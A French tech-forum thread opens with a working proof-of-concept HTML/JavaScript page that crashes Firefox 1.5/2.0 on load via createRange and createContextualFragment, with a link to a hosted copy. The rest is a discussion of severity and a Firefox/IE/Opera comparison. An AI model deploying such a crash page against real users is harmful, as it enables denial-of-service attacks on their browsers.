[Folcan]

Bsoir,

Alors la faille se nomme : Firefox createRange Crash (Exploit)

Et elle fonctionne plutot bien : http://folcan.nix3.fr/exploit/death.html

Et le tout, avec quelques lignes de javascript :

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
 <head>
  <script type="text/javascript">
   function do_crash()
   {
    var range;
    range = document.createRange();
    range.selectNode(document.firstChild);
    range.createContextualFragment('<span></span>');
   }
  </script>
 </head>
 <body onload="do_crash()">
  <p>Good bye Firefox!</p>
 </body>
</html>

Voilou, notons qu'apparement il existe la meme pour IE basé sur un DoS, mais pas reussi à m'en servir...

(source : http://www.securiteam.com/exploits/6H00W0AH5E.html)

PS : rooo le con, j'ai cliqué sur le lien, ca ma shooter FF, heureusement que la 2.0 possède la restauration de session !! Et je viens de decouvrir avec joie, que en plus de restaurer FF, il restaure les onglet, les multi-browserage, et aussi les champs de formulaire, donc mon message, il est resté . Marche nikel ce truc !

++

[offw0rld]

Quelle idée d'activer par défault le jvs.

Je sais Mr_kaliman, tu vas me dire qu'il suffit de ne pas allumer son pc

[Invit]

Pis en soit un DoS sur un navigateur c'est pas ce que j'appellerait une faille "critique"

[shiroko]

+1 car tu redemarre FF et il te demande si tu veux reprendre ton ancienne session

Mais merci pour la news

[zours]

De toute façon, je pars quand même du principe que Firefox est mieux. Ouais, je le trouve plus stable. Mais c'est pas tout. Thèmes et extensions. IE n'a pas ça (surtout la pléthore d'extensions dont dispose FF).

[Invit]

[...]
Vulnerable : 1.5.0.7 and below, 2.0
Risk       : Moderate
Impact     : Denial of Services (Code execution not verified)
[...]

http://www.milw0rm.com/exploits/2695

[Ewilan]

pas mal...
et toujours pas de correction pour ça ?

Entre IE et FF, je reste sous FF, mais il faut avouer que IE7 n'est pas si mal...

[zours]

Disons qu'ils ont fait des progrès.
Mais bon, vu le temps passé pendant lequel il n'y a eu aucune évolution, je prends ça comme un dû, et donc hors de question de les acclamer pour ça.

[Gardel]

Bien qu'ils aient rendu moins pire IE, il faut tout de même conserver à l'esprit que IE ne respecte toujours pas toutes les normes du W3C hein.

Et puis Firefox, c'est du libre, c'est du bon.

Arrêtez donc de comparer Firefox à IE, on ne mélange pas les tampons et les serviettes !

[shiroko]

Ba nan IE c'est comme FF au même titre que Linux = Windows !!

Rhoooo vous n'avez encore rien compris hein

Ok je ==> []

[BuRner]

Personne ne parle d'Opera ?

Je l'ai testé après avoir testé firefox et je l'ai adopté directement.
Plus de plantage intempestif (FF) plus d'utilisation de RAM excédentaire, et une rapidité de démarrage plus que satisfaisante.

J'ai donc cherché un peu et j'ai trouvé mon bonheur dans Opera, qui ne possède aucun de ces défauts.
Enfin bref moi je vous conseil de le tester voir ce que ça donne, ça coute rien après tout

Bonne journée

[Nebelmann]

Le seul souci d'opéra est qu'il est gratuit mais pas open source...
A part çà, il replace effectivement très bien Internet Explorer !

[Folcan]

Il est pluginable ?

[zours]

Il est pluginable ?

Je crois pas. Enfin même au cas où, aucun navigateur n'a pour l'instant la richesse de ceux de Firefox. Ca me fait parfois un peu chier, j'avoue, parce que certains plus sont sympas, mais bon...

[shiroko]

Non folcan, je n'ai jamais entendu dire qu'il y avait de plugin ... FF a le monopole du plugin